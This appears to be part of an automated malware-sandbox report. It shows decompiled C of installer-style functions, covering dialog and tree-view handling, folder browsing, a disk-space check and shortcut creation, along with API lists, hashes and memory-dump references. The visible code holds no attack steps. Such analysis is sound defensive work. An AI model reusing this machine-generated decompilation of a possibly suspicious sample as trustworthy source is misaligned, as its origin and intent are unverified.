					SendMessageA(_v8, 0x1109, _t285,  *0x79f564);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if(_t258 != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							_push(_t258);
							_push(_t315);
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E004059E1(_t286, _t315, _t320)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403DA7(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403DA7(_a4);
					_t318 = 0;
					_t288 = 0;
					if( *0x7a2fac <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									if((_t269 & 0x00000004) == 0) {
										 *( *0x79f578 + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x79f578 + _t318 * 4) = _t274;
									_t288 =  *( *0x79f578 + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_v24 = _t311;
						} while (_t318 <  *0x7a2fac);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403DDC(_v8);
								_t280 = _v32;
								_t315 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403DDC(_v12);
								L89:
								return E00403E0E(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































                                                                    0x004046c5
                                                                    0x004046cb
                                                                    0x004046cd
                                                                    0x004046d3
                                                                    0x004046d9
                                                                    0x004046e6
                                                                    0x004046ef
                                                                    0x004046f2
                                                                    0x004046f5
                                                                    0x00404916
                                                                    0x0040491d
                                                                    0x00404931
                                                                    0x0040491f
                                                                    0x00404921
                                                                    0x00404924
                                                                    0x00404925
                                                                    0x0040492c
                                                                    0x0040492c
                                                                    0x0040493d
                                                                    0x0040494b
                                                                    0x0040494e
                                                                    0x00404964
                                                                    0x004049dc
                                                                    0x004049df
                                                                    0x004049e1
                                                                    0x004049eb
                                                                    0x004049f9
                                                                    0x004049f9
                                                                    0x004049fb
                                                                    0x00404a05
                                                                    0x00404a0b
                                                                    0x00404a2c
                                                                    0x00404a0d
                                                                    0x00404a1a
                                                                    0x00404a1a
                                                                    0x00404a0b
                                                                    0x00404a05
                                                                    0x00000000
                                                                    0x004049df
                                                                    0x00404969
                                                                    0x00404974
                                                                    0x00404979
                                                                    0x00404980
                                                                    0x00404987
                                                                    0x00404991
                                                                    0x00404991
                                                                    0x00404995
                                                                    0x0040499a
                                                                    0x0040499f
                                                                    0x004049b5
                                                                    0x004049a1
                                                                    0x004049a1
                                                                    0x004049a9
                                                                    0x004049b0
                                                                    0x004049ab
                                                                    0x004049ab
                                                                    0x004049ab
                                                                    0x004049a9
                                                                    0x004049b9
                                                                    0x004049bb
                                                                    0x004049c9
                                                                    0x004049ca
                                                                    0x004049d6
                                                                    0x004049d9
                                                                    0x004049d9
                                                                    0x0040499a
                                                                    0x00000000
                                                                    0x00404987
                                                                    0x0040496b
                                                                    0x00404972
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00404a2f
                                                                    0x00404a2f
                                                                    0x00404a36
                                                                    0x00404aaa
                                                                    0x00404ab1
                                                                    0x00404abd
                                                                    0x00404abd
                                                                    0x00404ac6
                                                                    0x00404ac8
                                                                    0x00404acf
                                                                    0x00404ad2
                                                                    0x00404ad2
                                                                    0x00404ad8
                                                                    0x00404adf
                                                                    0x00404ae2
                                                                    0x00404ae2
                                                                    0x00404ae8
                                                                    0x00404aee
                                                                    0x00404af4
                                                                    0x00404af4
                                                                    0x00404b01
                                                                    0x00404c4e
                                                                    0x00404c55
                                                                    0x00404c72
                                                                    0x00404c78
                                                                    0x00404c8a
                                                                    0x00404c8a
                                                                    0x00000000
                                                                    0x00404b07
                                                                    0x00404b09
                                                                    0x00404b11
                                                                    0x00404b15
                                                                    0x00404b15
                                                                    0x00404b1d
                                                                    0x00404b5e
                                                                    0x00404b60
                                                                    0x00404b70
                                                                    0x00404b73
                                                                    0x00404b78
                                                                    0x00404b7f
                                                                    0x00404b82
                                                                    0x00404c24
                                                                    0x00404c2a
                                                                    0x00404c38
                                                                    0x00404c49
                                                                    0x00404c49
                                                                    0x00000000
                                                                    0x00404c38
                                                                    0x00404b88
                                                                    0x00404b8b
                                                                    0x00404b91
                                                                    0x00404b96
                                                                    0x00404b98
                                                                    0x00404b9a
                                                                    0x00404ba0
                                                                    0x00404ba7
                                                                    0x00404bac
                                                                    0x00404bb3
                                                                    0x00404bb6
                                                                    0x00404bb6
                                                                    0x00404bbd
                                                                    0x00404bc9
                                                                    0x00404bcd
                                                                    0x00404bcf
                                                                    0x00404bcf
                                                                    0x00404bbf
                                                                    0x00404bc1
                                                                    0x00404bc1
                                                                    0x00404bef
                                                                    0x00404bfb
                                                                    0x00404c0a
                                                                    0x00404c0a
                                                                    0x00404c0c
                                                                    0x00404c0f
                                                                    0x00404c18
                                                                    0x00000000
                                                                    0x00404b1f
                                                                    0x00404b2a
                                                                    0x00404b2d
                                                                    0x00404b32
                                                                    0x00404b34
                                                                    0x00404b38
                                                                    0x00404b48
                                                                    0x00404b52
                                                                    0x00404b54
                                                                    0x00404b57
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00404b3a
                                                                    0x00404b3a
                                                                    0x00404b40
                                                                    0x00404b42
                                                                    0x00404b42
                                                                    0x00404b43
                                                                    0x00404b44
                                                                    0x00000000
                                                                    0x00404b3a
                                                                    0x00404b1d
                                                                    0x00404b01
                                                                    0x00404a3e
                                                                    0x00000000
                                                                    0x00404a54
                                                                    0x00404a5e
                                                                    0x00404a63
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00404a75
                                                                    0x00404a7a
                                                                    0x00404a86
                                                                    0x00404a86
                                                                    0x00404a88
                                                                    0x00404a97
                                                                    0x00404a99
                                                                    0x00404aa0
                                                                    0x00404aa3
                                                                    0x00000000
                                                                    0x00404aa3
                                                                    0x00404a3e
                                                                    0x004046fb
                                                                    0x00404700
                                                                    0x0040470a
                                                                    0x0040470b
                                                                    0x00404714
                                                                    0x0040471f
                                                                    0x0040473a
                                                                    0x0040474c
                                                                    0x00404751
                                                                    0x0040475c
                                                                    0x00404765
                                                                    0x0040477a
                                                                    0x0040478b
                                                                    0x00404798
                                                                    0x00404798
                                                                    0x0040479d
                                                                    0x004047a3
                                                                    0x004047a5
                                                                    0x004047a8
                                                                    0x004047ad
                                                                    0x004047b2
                                                                    0x004047b4
                                                                    0x004047b4
                                                                    0x004047b7
                                                                    0x004047b8
                                                                    0x004047d4
                                                                    0x004047d4
                                                                    0x004047d6
                                                                    0x004047d7
                                                                    0x004047dc
                                                                    0x004047df
                                                                    0x004047e2
                                                                    0x004047e6
                                                                    0x004047eb
                                                                    0x004047f0
                                                                    0x004047f4
                                                                    0x004047f9
                                                                    0x004047fe
                                                                    0x00404800
                                                                    0x00404808
                                                                    0x004048d2
                                                                    0x004048e5
                                                                    0x00000000
                                                                    0x0040480e
                                                                    0x00404811
                                                                    0x00404814
                                                                    0x00404817
                                                                    0x00404817
                                                                    0x0040481d
                                                                    0x00404823
                                                                    0x00404826
                                                                    0x0040482c
                                                                    0x0040482d
                                                                    0x00404832
                                                                    0x0040483b
                                                                    0x00404842
                                                                    0x00404845
                                                                    0x00404848
                                                                    0x0040484b
                                                                    0x00404887
                                                                    0x004048b0
                                                                    0x00404889
                                                                    0x00404896
                                                                    0x00404896
                                                                    0x0040484d
                                                                    0x00404850
                                                                    0x0040485f
                                                                    0x00404869
                                                                    0x00404871
                                                                    0x00404878
                                                                    0x00404880
                                                                    0x00404880
                                                                    0x0040484b
                                                                    0x004048b6
                                                                    0x004048b7
                                                                    0x004048c3
                                                                    0x004048c3
                                                                    0x004048d0
                                                                    0x004048eb
                                                                    0x004048ef
                                                                    0x0040490c
                                                                    0x00404911
                                                                    0x00404914
                                                                    0x00000000
                                                                    0x004048f1
                                                                    0x004048f6
                                                                    0x004048ff
                                                                    0x00404c8c
                                                                    0x00404c9e
                                                                    0x00404c9e
                                                                    0x004048ef
                                                                    0x00000000
                                                                    0x004048d0
                                                                    0x00404808

                                                                    APIs
                                                                    • GetDlgItem.USER32 ref: 004046BE
                                                                    • GetDlgItem.USER32 ref: 004046CB
                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404717
                                                                    • LoadBitmapA.USER32 ref: 0040472A
                                                                    • SetWindowLongA.USER32 ref: 0040473D
                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404751
                                                                    • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404765
                                                                    • SendMessageA.USER32(?,00001109,00000002), ref: 0040477A
                                                                    • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404786
                                                                    • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404798
                                                                    • DeleteObject.GDI32(?), ref: 0040479D
                                                                    • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004047C8
                                                                    • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004047D4
                                                                    • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404869
                                                                    • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404894
                                                                    • SendMessageA.USER32(?,00001100,00000000,?), ref: 004048A8
                                                                    • GetWindowLongA.USER32 ref: 004048D7
                                                                    • SetWindowLongA.USER32 ref: 004048E5
                                                                    • ShowWindow.USER32(?,00000005), ref: 004048F6
                                                                    • SendMessageA.USER32(?,00000419,00000000,?), ref: 004049F9
                                                                    • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404A5E
                                                                    • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404A73
                                                                    • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404A97
                                                                    • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404ABD
                                                                    • ImageList_Destroy.COMCTL32(?), ref: 00404AD2
                                                                    • GlobalFree.KERNEL32 ref: 00404AE2
                                                                    • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404B52
                                                                    • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404BFB
                                                                    • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404C0A
                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00404C2A
                                                                    • ShowWindow.USER32(?,00000000), ref: 00404C78
                                                                    • GetDlgItem.USER32 ref: 00404C83
                                                                    • ShowWindow.USER32(00000000), ref: 00404C8A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.215788506.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.215777315.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215803259.0000000000407000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215810653.0000000000409000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215841924.000000000077A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215846812.0000000000784000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215853260.0000000000788000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215865050.0000000000795000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215869937.00000000007A1000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215874471.00000000007A9000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215879765.00000000007AC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215903702.00000000007CC000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                    • String ID: $M$N
                                                                    • API String ID: 1638840714-813528018
                                                                    • Opcode ID: f88003ccba9f0ad4292bbb639cf8dfb56ca7ece40271dea942f8be45a3b21ba3
                                                                    • Instruction ID: 9804f70a80ad740571f010f4d41a056d70bc73ca34169b501aedef0055c070ba
                                                                    • Opcode Fuzzy Hash: f88003ccba9f0ad4292bbb639cf8dfb56ca7ece40271dea942f8be45a3b21ba3
                                                                    • Instruction Fuzzy Hash: 3C029EB0D00208EFEB10DF64CD45AAE7BB5EB84315F10817AF610BA2E1C7799A52CF58
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004041E5, Relevance: 26.5, APIs: 9, Strings: 6, Instructions: 242stringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 68%
                                                                    			E004041E5(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				char _v24;
				long _v28;
				char _v32;
				intOrPtr _v36;
				long _v40;
				signed int _v44;
				CHAR* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				CHAR* _v68;
				void _v72;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr* _t81;
				int _t86;
				int _t88;
				int _t100;
				signed int _t105;
				char* _t110;
				intOrPtr _t114;
				intOrPtr* _t128;
				signed int _t140;
				signed int _t145;
				CHAR* _t151;

				_t75 =  *0x79ed58;
				_v36 = _t75;
				_t151 = ( *(_t75 + 0x3c) << 0xa) + 0x7a4000;
				_v12 =  *((intOrPtr*)(_t75 + 0x38));
				if(_a8 == 0x40b) {
					E004052A3(0x3fb, _t151);
					E00405BFB(_t151);
				}
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L19:
						if(_a8 == 0x40f) {
							L21:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							_t145 = _t144 | 0xffffffff;
							E004052A3(0x3fb, _t151);
							if(E004055AC(_t169, _t151) == 0) {
								_v8 = 1;
							}
							E004059BF(0x79e550, _t151);
							_t80 = E0040555F(0x79e550);
							if(_t80 != 0) {
								 *_t80 =  *_t80 & 0x00000000;
							}
							_t81 = E00405CD2("KERNEL32.dll", "GetDiskFreeSpaceExA");
							if(_t81 == 0) {
								L28:
								_t86 = GetDiskFreeSpaceA(0x79e550,  &_v20,  &_v28,  &_v16,  &_v40);
								__eflags = _t86;
								if(_t86 == 0) {
									goto L31;
								}
								_t100 = _v20 * _v28;
								__eflags = _t100;
								_t145 = MulDiv(_t100, _v16, 0x400);
								goto L30;
							} else {
								_push( &_v32);
								_push( &_v24);
								_push( &_v44);
								_push(0x79e550);
								if( *_t81() == 0) {
									goto L28;
								}
								_t145 = (_v40 << 0x00000020 | _v44) >> 0xa;
								L30:
								_v12 = 1;
								L31:
								if(_t145 < E004045FA(5)) {
									_v8 = 2;
								}
								if( *((intOrPtr*)( *0x7a275c + 0x10)) != 0) {
									E00404545(0x3ff, 0xfffffffb, _t87);
									if(_v12 == 0) {
										SetDlgItemTextA(_a4, 0x400, 0x79e540);
									} else {
										E00404545(0x400, 0xfffffffc, _t145);
									}
								}
								_t88 = _v8;
								 *0x7a3024 = _t88;
								if(_t88 == 0) {
									_v8 = E00401410(7);
								}
								if(( *(_v36 + 0x14) & 0x00000400) != 0) {
									_v8 = 0;
								}
								E00403DC9(0 | _v8 == 0x00000000);
								if(_v8 == 0 &&  *0x79f570 == 0) {
									E0040417A();
								}
								 *0x79f570 = 0;
								goto L45;
							}
						}
						_t169 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L45;
						}
						goto L21;
					}
					_t105 = _a12 & 0x0000ffff;
					if(_t105 != 0x3fb) {
						L12:
						if(_t105 == 0x3e9) {
							_t140 = 7;
							memset( &_v72, 0, _t140 << 2);
							_t144 = 0x79f580;
							_v76 = _a4;
							_v68 = 0x79f580;
							_v56 = E004044DF;
							_v52 = _t151;
							_v64 = E004059E1(0x3fb, 0x79f580, _t151);
							_t110 =  &_v76;
							_v60 = 0x41;
							__imp__SHBrowseForFolderA(_t110, 0x79e958, _v12);
							if(_t110 == 0) {
								_a8 = 0x40f;
							} else {
								E0040521C(0, _t110);
								E004054CC(_t151);
								_t114 =  *((intOrPtr*)( *0x7a2f88 + 0x11c));
								if(_t114 != 0) {
									_push(_t114);
									_push(0);
									E004059E1(0x3fb, 0x79f580, _t151);
									_t144 = 0x7a1f20;
									if(lstrcmpiA(0x7a1f20, 0x79f580) != 0) {
										lstrcatA(_t151, 0x7a1f20);
									}
								}
								 *0x79f570 =  *0x79f570 + 1;
								SetDlgItemTextA(_a4, 0x3fb, _t151);
							}
						}
						goto L19;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L45;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t144 = GetDlgItem(_a4, 0x3fb);
					if(E00405538(_t151) != 0 && E0040555F(_t151) == 0) {
						E004054CC(_t151);
					}
					 *0x7a2758 = _a4;
					SetWindowTextA(_t144, _t151);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403DA7(_a4);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403DA7(_a4);
					E00403DDC(_t144);
					_t128 = E00405CD2("shlwapi.dll", "SHAutoComplete");
					if(_t128 == 0) {
						L45:
						return E00403E0E(_a8, _a12, _a16);
					}
					 *_t128(_t144, 1);
					goto L8;
				}
			}




































                                                                    0x004041eb
                                                                    0x004041f2
                                                                    0x004041fe
                                                                    0x0040420c
                                                                    0x00404214
                                                                    0x00404218
                                                                    0x0040421e
                                                                    0x0040421e
                                                                    0x0040422a
                                                                    0x004042a4
                                                                    0x004042ab
                                                                    0x00404377
                                                                    0x0040437e
                                                                    0x0040438d
                                                                    0x0040438d
                                                                    0x00404391
                                                                    0x00404397
                                                                    0x0040439a
                                                                    0x004043a7
                                                                    0x004043a9
                                                                    0x004043a9
                                                                    0x004043b7
                                                                    0x004043bd
                                                                    0x004043c4
                                                                    0x004043c6
                                                                    0x004043c6
                                                                    0x004043d3
                                                                    0x004043df
                                                                    0x00404403
                                                                    0x00404414
                                                                    0x0040441a
                                                                    0x0040441c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00404422
                                                                    0x00404422
                                                                    0x00404430
                                                                    0x00000000
                                                                    0x004043e1
                                                                    0x004043e4
                                                                    0x004043e8
                                                                    0x004043ec
                                                                    0x004043ed
                                                                    0x004043f2
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004043fa
                                                                    0x00404432
                                                                    0x00404432
                                                                    0x00404439
                                                                    0x00404442
                                                                    0x00404444
                                                                    0x00404444
                                                                    0x00404456
                                                                    0x00404460
                                                                    0x00404468
                                                                    0x0040447e
                                                                    0x0040446a
                                                                    0x0040446e
                                                                    0x0040446e
                                                                    0x00404468
                                                                    0x00404483
                                                                    0x00404488
                                                                    0x0040448d
                                                                    0x00404496
                                                                    0x00404496
                                                                    0x0040449f
                                                                    0x004044a1
                                                                    0x004044a1
                                                                    0x004044ad
                                                                    0x004044b5
                                                                    0x004044bf
                                                                    0x004044bf
                                                                    0x004044c4
                                                                    0x00000000
                                                                    0x004044c4
                                                                    0x004043df
                                                                    0x00404380
                                                                    0x00404387
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00404387
                                                                    0x004042b1
                                                                    0x004042b7
                                                                    0x004042d1
                                                                    0x004042d6
                                                                    0x004042e0
                                                                    0x004042e7
                                                                    0x004042ec
                                                                    0x004042f6
                                                                    0x004042f9
                                                                    0x004042fc
                                                                    0x00404303
                                                                    0x0040430b
                                                                    0x0040430e
                                                                    0x00404312
                                                                    0x00404319
                                                                    0x00404321
                                                                    0x00404370
                                                                    0x00404323
                                                                    0x00404324
                                                                    0x0040432a
                                                                    0x00404334
                                                                    0x0040433c
                                                                    0x0040433e
                                                                    0x0040433f
                                                                    0x00404341
                                                                    0x00404347
                                                                    0x00404355
                                                                    0x00404359
                                                                    0x00404359
                                                                    0x00404355
                                                                    0x0040435e
                                                                    0x00404369
                                                                    0x00404369
                                                                    0x00404321
                                                                    0x00000000
                                                                    0x004042d6
                                                                    0x004042c4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004042ca
                                                                    0x00000000
                                                                    0x0040422c
                                                                    0x00404237
                                                                    0x00404240
                                                                    0x0040424d
                                                                    0x0040424d
                                                                    0x00404257
                                                                    0x0040425c
                                                                    0x00404265
                                                                    0x00404268
                                                                    0x0040426d
                                                                    0x00404275
                                                                    0x00404278
                                                                    0x0040427d
                                                                    0x00404283
                                                                    0x00404292
                                                                    0x00404299
                                                                    0x004044ca
                                                                    0x004044dc
                                                                    0x004044dc
                                                                    0x004042a2
                                                                    0x00000000
                                                                    0x004042a2

                                                                    APIs
                                                                    • GetDlgItem.USER32 ref: 00404230
                                                                    • SetWindowTextA.USER32(00000000,?), ref: 0040425C
                                                                    • SHBrowseForFolderA.SHELL32(?,0079E958,?), ref: 00404319
                                                                    • lstrcmpiA.KERNEL32(007A1F20,0079F580,00000000,?,?,00000000), ref: 0040434D
                                                                    • lstrcatA.KERNEL32(?,007A1F20), ref: 00404359
                                                                    • SetDlgItemTextA.USER32 ref: 00404369
                                                                      • Part of subcall function 004052A3: GetDlgItemTextA.USER32 ref: 004052B6
                                                                      • Part of subcall function 00405BFB: CharNextA.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C53
                                                                      • Part of subcall function 00405BFB: CharNextA.USER32(?,?,?,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C60
                                                                      • Part of subcall function 00405BFB: CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C65
                                                                      • Part of subcall function 00405BFB: CharPrevA.USER32(?,?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C75
                                                                    • GetDiskFreeSpaceA.KERNEL32(0079E550,?,?,0000040F,?,KERNEL32.dll,GetDiskFreeSpaceExA,0079E550,0079E550,?,?,000003FB,?), ref: 00404414
                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040442A
                                                                    • SetDlgItemTextA.USER32 ref: 0040447E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.215788506.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.215777315.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215803259.0000000000407000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215810653.0000000000409000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215841924.000000000077A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215846812.0000000000784000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215853260.0000000000788000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215865050.0000000000795000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215869937.00000000007A1000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215874471.00000000007A9000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215879765.00000000007AC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215903702.00000000007CC000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CharItemText$Next$BrowseDiskFolderFreePrevSpaceWindowlstrcatlstrcmpi
                                                                    • String ID: A$GetDiskFreeSpaceExA$KERNEL32.dll$Py$SHAutoComplete$shlwapi.dll
                                                                    • API String ID: 2007447535-1909522251
                                                                    • Opcode ID: fa85b854a19c834815a7f5dd914cc43de4103a60353febe687952c11a8408a20
                                                                    • Instruction ID: ef859d302125b71f7b9a0a5e3096057e4f4c42b01edd6451a005236750c2ec27
                                                                    • Opcode Fuzzy Hash: fa85b854a19c834815a7f5dd914cc43de4103a60353febe687952c11a8408a20
                                                                    • Instruction Fuzzy Hash: 0D819BB1900218BBDB11AFA1DC45BAF7BB8EF84314F00417AFA04B62D1D77C9A418B69
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004020A6, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132comCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 74%
                                                                    			E004020A6(void* __eflags) {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E00402A9A(0xfffffff0);
				_t96 = E00402A9A(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x2c)) = E00402A9A(2);
				 *((intOrPtr*)(_t100 - 0x34)) = E00402A9A(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x44)) = E00402A9A(0x45);
				if(E00405538(_t96) == 0) {
					E00402A9A(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x407324, _t75, 1, 0x407314, _t44);
				if(_t44 < _t75) {
					L12:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407334, _t100 - 8);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\hardz\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x14);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x14);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0x34)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 0x34)),  *(_t100 - 0x14) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
						if(_t95 >= _t75) {
							 *0x409418 = _t75;
							MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409418, 0x400);
							_t69 =  *((intOrPtr*)(_t100 - 8));
							_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409418, 1);
						}
						_t66 =  *((intOrPtr*)(_t100 - 8));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L12;
					}
				}
				E00401428();
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}





















                                                                    0x004020af
                                                                    0x004020b9
                                                                    0x004020c2
                                                                    0x004020cc
                                                                    0x004020d5
                                                                    0x004020df
                                                                    0x004020e3
                                                                    0x004020e3
                                                                    0x004020e8
                                                                    0x004020f9
                                                                    0x00402101
                                                                    0x004021df
                                                                    0x004021df
                                                                    0x004021e6
                                                                    0x00402107
                                                                    0x00402107
                                                                    0x00402118
                                                                    0x0040211c
                                                                    0x00402122
                                                                    0x0040212c
                                                                    0x0040212e
